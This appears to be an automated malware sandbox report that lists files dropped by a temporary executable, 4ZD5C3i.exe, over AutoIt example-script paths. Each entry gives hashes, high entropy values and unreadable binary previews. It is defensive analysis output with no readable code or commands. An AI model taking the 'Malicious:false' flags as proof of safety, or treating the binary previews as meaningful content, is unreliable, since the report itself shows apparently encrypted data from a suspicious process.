                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1281
                                                                                                                                                                                                                                                Entropy (8bit):7.835550332983771
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:J+3K91fii4p1nirtTn2BiuMUqO8KkRBjmJrc0YXUZtwsT1s:J+CEPpeNuMUqOUX4o0jZtwB
                                                                                                                                                                                                                                                MD5:F34F44488494502ED67C32CB839CA0FC
                                                                                                                                                                                                                                                SHA1:EFF59269675C181FF88C61D23030DE3F1E055764
                                                                                                                                                                                                                                                SHA-256:6296960AF77F131A27E1A6988C66BFAAAD54105B0566AAC764D38CC258B28609
                                                                                                                                                                                                                                                SHA-512:540C146D9E70DD35676D531F5A9FA536D956BE7504BBDD40956FD062FDD3EC4D0C63CE0E97F023DAD603E6360D0C9FC87DCA1E356198356D1E885170A2C84D31
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.t..Dlf.....Zu7p9.^X..?jQ..R..=..#...g..."..O3..5H7t..MFj..e4J. .....H0T.&...c..}.@.&$9.[Y..E#0.h8.D.....B.....A;..qF.<.W.Z.KQ`=y# J<..F..>....hl2...X. ...K..s.}...?.+a... "&3.....*.@.w.....Z...8.)..0....#.......B.....w..[.F1,.p..^......zh......C....5..=..b!K....".].. .S.w;..:.+........i,.`.\.....e.......z kLM...+q.Rp.....J.........g(..)..P[Z..z......>u...q.....(K.a....NI...`j....*z5K...u...kS...F.c.p.......?...]..WZH.3...F.K.2....GH..`u.H.../.....kru...p..+.~6..A..9...!...L.%..){:.V....)}Nw.#.&r4..7..9$^...J..2..&jn..;o.#..3`...h.>........4....+V.....G..c.+..+.....'...Y....<..-.t5.{.{.f....J2m.......................0-..@3.=..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.})

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayFromString[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2673
                                                                                                                                                                                                                                                Entropy (8bit):7.92661175954283
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:gsS5J8+guqXEUvQq9M1+iSWmh0F1w4vtL7SKuGF9q4o0jZtwhdu:gsSX8+PiEUvFrXH4vFCqllehc
                                                                                                                                                                                                                                                MD5:7756CE18C3D08C68FEDDE19A251EC85B
                                                                                                                                                                                                                                                SHA1:27F34DD6549B9A6A0467C63A496B7FF20B34D8BE
                                                                                                                                                                                                                                                SHA-256:FF082DD920DFC5822ACB12C94632CCE3843F22F9A905736577531C8AB914FAAD
                                                                                                                                                                                                                                                SHA-512:2AEB7D4F5343F6A7403B75656D56DEB79761DD2B77C285EEDD4F162418A21DEA9759B2826490C480D20EFBBCCE51649338232D88CBB25369D721FBBBF5F3DD04
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:I......}?......|.....d..._...T..R.!-.k ].j..f.K.D.[...U@..k...T..&ht.."...U....;b.e..@iK.R..c>gD..EI.y...u.g..f.L....h.....@....#.6..g...-.5I.t.AM..J.Hi.......c...4.U^.C.Oql....v,..5..f................".s%.R....iK.eOIF.G.....-.M..I9..=.o.L.l.>.. .}.....R...*z.D....../.............;S..(+.?<.'..7Y...V........N.*.{7l.....@.ZF...;..5.......U3.m/..WU.HTbU.E]..6m.Fe.XOx....Z..1.OKe/..".n.4.9X.u..h..X.I.em....:..u..;7f.._YO...d..i..'?2.....XEy.Wx.......s.O..zQ.`.\.@..|(*....V.'y.]...2...1....).@...t. i.-D.%..Xj....OY...4..l....N:..Qk.(..Z...\..j.zB@.....kf..w.E../.u8.mf..j'.$...y..9.S..m0A....ed.U..w.D.)!4_7=.{.6.'..\=.2w....].......S.5.....E.w.F..c$...=.dz9..SP....d.......F..Bf.9..9......n.g.P.~..D..m>....(.....h.^..<...sC.[|'...+.{.S.+..Z7..."..R.CbKR..P.d..E).B.9.3......5`.\.f.[....K..$].W`?4.ka,.&..v...l.x..4IJO.f.+.x*L...}b..[.gZ@.)H.X8^.wM...[d.cK.F...J.q.uG....wo.(.....J....^&.......c..!.%8..DE....._..|.~...e. H..........UZ>.Oq..z.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayInsert.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1683
                                                                                                                                                                                                                                                Entropy (8bit):7.8809619325688836
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:4GXB2lBjBwU859XEos6N9/XWyTn7fPlN/PYwxu6D+Vaqbk/tjmJrc0YXUZtwsTpQ:pXkTjW/TsVyTLb/PYwnDVt4o0jZtwJ
                                                                                                                                                                                                                                                MD5:3B2761A50CC3E1406AAB046B558ECC50
                                                                                                                                                                                                                                                SHA1:6BDAB87F9D98925D7142C893F9E14D6BF76B5127
                                                                                                                                                                                                                                                SHA-256:95DEF581ACB392E996DB6BE060F1DE896FCC4E95F9F374EF6D28CD72059A72C6
                                                                                                                                                                                                                                                SHA-512:202BBB4154EDA664C6EC284AE58B6D48A5FF813789ACB26C69E369932173DF3E5D6827747D8BE2C78B1A310583F1DA1D41F46646800DEB1AACF2B20C22150EEE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.l.^vs..2.MN...w$6%....O..C..}..............1.d...y.R..!V..X.....j.3..,...kj......x...i..!.`.Te.I..L....5..0.^\.[..+...+lz.......N<gM..Q.q}K..c...k.g9..XO.V-....K."..2..]$.0.S..O.0T...N........Pe.g..M.%.>...;J.....;...R&...u.?-.D.0R.z...@3E....7../.8..l...c.n4.]...M&z./......?....e.......=o.3.v.n...Sw...v......k...D...O.6.........:gP.{jt....=..0.?F...&.....Bkj....4+`"......O...k.G...X...r......K..2~...l.;..}.?-.Z..g....jC6.6.G~...J-..{.:X..s...E......0..U..?`/;...Xi...\.!.U)2.!.&.0@....Ld.9...U.F.'.a.1M<...7D\.....&.z|..h....U.([..L/.1...lt..r}.es.:..[.gT0C........u..J....0s...<.n...J.].C:..7.hg%0.WS...=..Z..../.l...G9.._}...K....5..........pe...D..@.....e.nP...l...yj..o..J.........T..a...C../&..NV/F....p!.sg..$?...j.*.p.1_.O.]..I.Sh.qC...k.XB..<.4O.....tt ..=.9B..Z...B...t......$.{.q..;....@......L-u..l$..,x.gIA..<..6p.+.E\7E.j.[...0..#.)5ML......{.'..X..]R..h....cj^d..Rz.7..-.....j8H,..m...&....[.cO.Q...^-....)..ed$..KZ..K.....b..LV.....U

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayInsert[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2219
                                                                                                                                                                                                                                                Entropy (8bit):7.901369879636272
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:DfPCYBi9zNaLi3D4moshysx6JyYapW4LH4o0jZtw0:G4i9ZaLiTmsosU36lIle0
                                                                                                                                                                                                                                                MD5:12475FEF852647EFD277383C199BE92A
                                                                                                                                                                                                                                                SHA1:2945C04E2BE8BD0B5BBDD81ADDCFC0BFF5E58C22
                                                                                                                                                                                                                                                SHA-256:95C5BDA9029BD9905BB8BFC731A5E9F6E3388A044826CCCA873BD220CFEA069D
                                                                                                                                                                                                                                                SHA-512:EC94CC3B7BEE2EA78A0985CE16799F4B7E156E400A8EC420B583D92C5AA5B9AA395B5AC7008B5EF09B59E86523A7FEE1263C8ACA760ADCD5840884ECB4576818
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..X.....7.}...y'6.<..+....>U....U.|o.. .'..L.fA#.....J.G..%]..A....;$=..u...?. '.|8..gl....~lx.V......a.jLeJ..%...K.D....1b.x..t.R..y..}.B/4.......mA,.V...JO.2s...{..l.!.....&....C.+.E+.i..t.......C..l....-..c..c..[._.M..J.....)...YL`..@..4._D...PS...P...I.O...M.7O b.......Y....W`/..t..|N.UH6....s/..`.6&.] X...O..?.}...(G..N..H/.R.....T'p`9J.1....]..1.R.wb..A..hr..v...:..%B#.9.z..9:.e.?.....\;G.......mfO.....YuK.p!...H.4i.k..W.\..0F...~.0...`M.?...Q..7(.N2.6kG.OL^..u.....w...Y....EcE.....#(.s...}..IP.I...{).w.......?...c+...;.......L...d...%.CF;.z....O..<..N.c.2.6.B`.[...p*..?Q.h..... .:Y....kr..\.0..d.n..P.......t.OA..H.}@..=.....=...9?,......U..obn....#.B;C....F.KZ.G..f4.QJR.1=.8WV>.y;......h'.0b1.}.......,.;......z.....OF{6b..Pp`P.......L..o.?R...........}-.|..5..-g.2u.....A.:[.wd...6.......:.........H.by...U......'9....<.....(..{....l|........T!`...O.....s...[...F..T......j.YS....H....lFQ....[f..[.{..J..;R.....$.K.X

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayInsert[3].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1631
                                                                                                                                                                                                                                                Entropy (8bit):7.867309417620764
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:se0c6gC8sQg+PoLkMDqHYyPQ30W6lTWWajmJrc0YXUZtwsTjG:sLgHg2oQMYT/W4o0jZtwV
                                                                                                                                                                                                                                                MD5:82FAADD5B3D34B138A059013085ABA0C
                                                                                                                                                                                                                                                SHA1:085A2368B7BD7BEE089D1AA8488A85C471EBE2AF
                                                                                                                                                                                                                                                SHA-256:11D1D2C24499ECC90A7C4875F065814742DD38B73E7E006EBD41851B8AB1036B
                                                                                                                                                                                                                                                SHA-512:4ADB3202FA730A43BEC3A40FADADA6941B46ADCF478CE3A5E3CA367AABEFCABF5A33A989C9400BE5670AC2B04047BBA724041D64EEA5AB783B84A67B225F2B5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Z..4.H".p1.k.@2.G.2.g@.'y.....3I3..a......1.k.T+w........=`..]3~......_..v..}.E.....>......F....>....P.c..Q.O%D..Yj?..9(....d.....|....P.#H../..........c.t.[a.:.LDJ.rx4.....j....Pe ;.ZX...S"b/..:oV.......Y../.#[...HVA'\....aD..[[.l.,.C.......t..d.)s..Y.....o.12%...Z@}.'@...%.zhx........./..G.u |...z..,3$.dG.....J..26....Gy.~."Lz....ebX....Hm./.2L.8...B..w...U...=..8.0...38...J.(.........>..K'E..L.......W.[.X.....J...J...[.,......?.u..d..\c.......-6....I..B..<x....KA...VH.R...&..ML.....d..+..}^....~[.3....q..W.W...N...S.).R...u....ex........T....-E...I..........k./.tQl[..__.i<..,.L_I).....]Rz......[qZ...0....vz.};.A.9...i.T.S...B..Po....c.....q.....m.b>...u.Qq...ou..,..lm|[.9S^...<[@...}...+N...y)4...F..P....kH.U3..Q4?.5..D".=AU..{.......P.l}^...H.v~.T.#%..K(Z0D\A..,..R.....=.3..q........P.....j b.....r..w...c.A.Z...k.J.<{........Q.*......q..3....tne5:...\...D..k...........FQ.]}.D..\.#..?......5.....f...`...k.......b....K+p.g<."..\..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayMax.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                Entropy (8bit):7.812296231254359
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:QOV8AcAHWQhn+dEi9MILjmJrc0YXUZtwsTj:xV8AcAHWQhnqEejP4o0jZtws
                                                                                                                                                                                                                                                MD5:CFFF33F78A41D6719B1B0E2CDBEF4A89
                                                                                                                                                                                                                                                SHA1:23C483938209148249FF4A90E3F1E367872521B8
                                                                                                                                                                                                                                                SHA-256:A82778454E0CF8066A16E0051850D87381620CEC4006CC40F54446552EADD2C5
                                                                                                                                                                                                                                                SHA-512:70329C928A1B3FC0FBD8EE9BF6DC66B92F0DECEF290F937D8CEB7F3766AEBEE64E51FDC42D6B9C6A3CAAB7CB26B7D3489198370FF0C0D54CC6EDCF0C1BD7525D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<#.J.....;...&@.Ck..MY...W....rJ.e.n.p?.Kr,..4..X...6...?.O.8.7.e.*.eU(...p..=.R....DG*.F.Nt.?Q..(N....$..D.+.L.%Q......H.O:..s0i?.9.{.xD>.O.]..P\Omo/R<.....L.:.n.g.sU.#.N7.......NB.M8.Vq@B........o........K....:kK.?.#.M..*E'...L.F.+r..). .....Tk>.......^....._.....;#h.jf]}U..L.g..W....>{H~}..Iu.Od......T`).k..9J./O......-/..1.K..>..c.|w16.b~.c/.........C...C.k....!FJ......N...A}z....Ep.....S....,..]rsr.v.Mt.TWcg....m...o:i.VCLa..6.|....'.{.X-.U..u.~...3..@.w..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayMaxIndex.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1129
                                                                                                                                                                                                                                                Entropy (8bit):7.777657352693303
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:g1p0buRoo24YVyRVNrYHEQFzpjmJrc0YXUZtwsT0:gX0buR52zVygE4z54o0jZtwr
                                                                                                                                                                                                                                                MD5:A3669FEF3F4976C318E23827DD8171B2
                                                                                                                                                                                                                                                SHA1:C3FE24F4B921E9F9F96D6FC48B10F9F812E05D38
                                                                                                                                                                                                                                                SHA-256:BDF2B0364CD7F11078C73195030BF97236F2A89A25AAD4B4BD2C88663A334E45
                                                                                                                                                                                                                                                SHA-512:8A11686E4F96ED319C20DDDFF2B3CB94C204AFD84D46FFF490E2A05101D55AA3C39A447643DD6D5B172778B6AED835688E3DC52449D1FFAA2D61654B5A5ADFED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:C.7.|..D!........$.g.....M..mY....;..3I..z...2..p..r.j..(Q.l../83..CU......(.........p...K;....Hj>n.w^.y665..,l.}.1....1,.......@0.....y..:.q.n..pw>a)E:.Mw....'..8..}.I.#..{..W.9.l.G....y..{g.?{...<J.P..n.J.. ......W.u1.$.G.M..As...-..@l.[. M...r.8.....p.....B...$...H.'.@....3..O[=. ...,CS...t..@.I3.-.D/@q.@..@.1S..2.p.m|.l..*..W..A.=..Bv..vZ.#F.B.F..E8+UJ..4..vP..........j..A.O......g0W.!624".a...!.Z^f..&w.F.g!4.....D>.h.d!......k fNWJH.].............aO...A.&...$8o..0T..%.,..X.w..|v.@.>.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayMin.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1096
                                                                                                                                                                                                                                                Entropy (8bit):7.750061789365574
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:88myal8HNc5Zyqf48PDkPOID1jmJrc0YXUZtwsTQR:8ryayHevfwPOg4o0jZtw7R
                                                                                                                                                                                                                                                MD5:1A6783677871D4381DCC1F752C9D6575
                                                                                                                                                                                                                                                SHA1:979EE847234591A6040C5572C34A46BE2426B69D
                                                                                                                                                                                                                                                SHA-256:F2C518871915D451EAEB8EFD5F157EA70FE721AB29F1A9A72390AEDC33F61FD9
                                                                                                                                                                                                                                                SHA-512:6248FC459CEDD16B7B0ECB4243F75E399A71148219F532F9BD50BECFA57BF47C745914E994CDE784F5E779F1DAD14366C77B1299B6E44D9386A698483C718B33
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....l.[a...\....}..z.h....a..~;.bO.*d..HH.1f*...J...{...o....J2f......=3....{...n,ew..........).X....f...Iy..M.h..:....o!_..^x{.uv.D.J.S...pEb...K...V%.u5.D...G.....py.8..`v......".7....:.s............^Q.......H=.....N).. .|.u..G....(.. ..y..a.ND....=.'.%.-u..Q..mN.m..u&.'....@.6.6C..y$.#B.....0 ..N==.L.w=#..a'.8....)......B......<.c...D....n...?...XNs.0..|...f.b..L@P..1.G..Z.|K[..|.....u<....G...8P.J.../D.n0R{!.%..%..Hc=...<7..[..6...N..D.)Q3...yf.s.ed....w.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayMinIndex.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1129
                                                                                                                                                                                                                                                Entropy (8bit):7.796511125551028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:dvlfu15DTJvegweCkAY8IUF31+DjmJrc0YXUZtwsTBS:dgxdWgweCUUF31+H4o0jZtwOS
                                                                                                                                                                                                                                                MD5:1021438E65F2197B1C66F870EB039929
                                                                                                                                                                                                                                                SHA1:FE75D92108017E859C9B13130305274D53D51AE2
                                                                                                                                                                                                                                                SHA-256:570DE8D8F3EDDDE8E3159530393436944414AADC6C642C073025C31C43F263E8
                                                                                                                                                                                                                                                SHA-512:F8E674AA5688DD82A707DA0EC62754531B88EC3FCDA9EBD822184CAACD037D5310B2F89D464038C338990DF5C21E8A32659083842D12252B77565125A13DF3B5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...1$..v...g.}...b.c.].'."..K..Z.......c.j....Q.{=.f.. ..~..q4........]&3..b...&....T5j.R~.w.78A....oT..RB..x/.E.$.-v.!.!.._.5.c.y.9.p.....X..r.......O..oO....4......_..%..e..I}{...#...+..Q...a......x.h-...~U..B.dP!u...;.q|e....0.[U..l+.qk9.v.}5.....7N.-4....1...>...n.....Lw.w(......;DiM..v.!..c.......&...hB]s:.%...gC.....A..zi........B.]..u...>.u(...-.{.~...4........t.........."..m|.D..&W.Ux..fb..{y.-.E.{v...h@..Y..G..<vw.....18.1...u.3..k...9....c.C....G....E:~G...N.T(x.1..f.6.1.:.d..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayPermute.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:Arhangel archive data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):852
                                                                                                                                                                                                                                                Entropy (8bit):7.742259010890459
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:Ah88gV7YwVl/OVzNQcjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ8:A8VUwVlWV2cjmJrc0YXUZtwsTb7w
                                                                                                                                                                                                                                                MD5:4694B811CE0748C42C6E9E2E26B4F873
                                                                                                                                                                                                                                                SHA1:4C6171C2853A709A701942648999F4CFC7691D2F
                                                                                                                                                                                                                                                SHA-256:0EE1CFCB500749DB7B016BF007C8885772F840E5C320520112FC2E0404ECBB65
                                                                                                                                                                                                                                                SHA-512:D54315715386ED56289A2463F1E7DA037B7C4250B6D4E903A3B242A4DE4A928CB38E3BE4338B1E84EDB167B5A62F44E60EA0883A63EE145483875C60B8919B38
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:LG.....q.WY.*.@h.G0..@.m. ..>*4...4bN..!6..>'2.%....n..;}<....;>J<...`.t....h.7.,J.\...".q..~u.......2..,w..B...j.....^.z.(.*...]"...,G.`...6.[.F....&....M.....I@hF...^...7.fo.x...O..>....YE.u.(w.o._.i.#...........:4n.(.......0.=.9..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$........M5.8F...I....2..Eq.x..S/.W.i....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayPop.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1137
                                                                                                                                                                                                                                                Entropy (8bit):7.8289697939751
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Vnigg6gHgvz/NspqzYfcr8+jmJrc0YXUZtwsTx:s6MgvJspTcrv4o0jZtw2
                                                                                                                                                                                                                                                MD5:EB4CB584AE052265822D5D4272A21A32
                                                                                                                                                                                                                                                SHA1:D46FA0E7C65155732C6C2B9AF8E079B48D6B23E1
                                                                                                                                                                                                                                                SHA-256:C26663C40DCB15009B78FED999C9FC615059850A56F6EEC0998980665AC19178
                                                                                                                                                                                                                                                SHA-512:38A4BA27C2FDD7E6A3066FE68F9C60530BEEC934E68C7D039D5B1C7EE9F6ECDB50BE75BF0D216799B2287ECB362F64E921725C1F215B84E1C25794E344E7EB99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..:"....?7.UF..V.....h..,G.)S........8...J./WI#VWSN# ...&_KTg|...Kh...."+..=?.U.....C{.h..{.,]O.F[g.......BF.*.A..P.T.~zM..D.-e.L..b[.WuJk........3.z.K!...#.+bSP...h. .wq...m........Wb..A?.=...{.k.....F.V,..gm2*._~...yb~)8.s...c...A.)7...#.Q.h....g...o5.v./+QU.l.ooFPqf.b.....\z^l.+F.....3.V.N!..1.v2Q..:7..]..?..YZ.}`..sOp..@.<:....Qf;.1.....sS%.BV...8.3..&8.^0..{U!R... ...m..;'2.`Z.+.f.(Z`.A$.8}.D..Hx...2....u@..........2"....3C)xM8....(>.z(..+w...`....*X.s.5PlU\BS.3...1Ro....s....D...R.'.ai...*..TYMw.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayPush.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1190
                                                                                                                                                                                                                                                Entropy (8bit):7.814258123287578
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:cf5+dJhgYDuDs9YNWlCtpLvSZqfjmJrc0YXUZtwsTCSa:cf5+d1qCYNWmpLSA4o0jZtwhSa
                                                                                                                                                                                                                                                MD5:DB59B7021FD0B7783F2047CAC12F7EF7
                                                                                                                                                                                                                                                SHA1:826E5AD5D1A36CF0E3525D798A5962AED0368C56
                                                                                                                                                                                                                                                SHA-256:1274F70183426BFB4F5C5BA1B965C8FE046C56EA7BC0A5A3FCFEE2026F6E93F7
                                                                                                                                                                                                                                                SHA-512:F39428CCFC50E4589F6EFA8EDCABD25D12246E1F6A32E54443D5CF284FC4607F3E6CD03DACA9BAEEB59B0899B1F59BA1EC002F06D4220BE684BA8A3BCB52C17B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
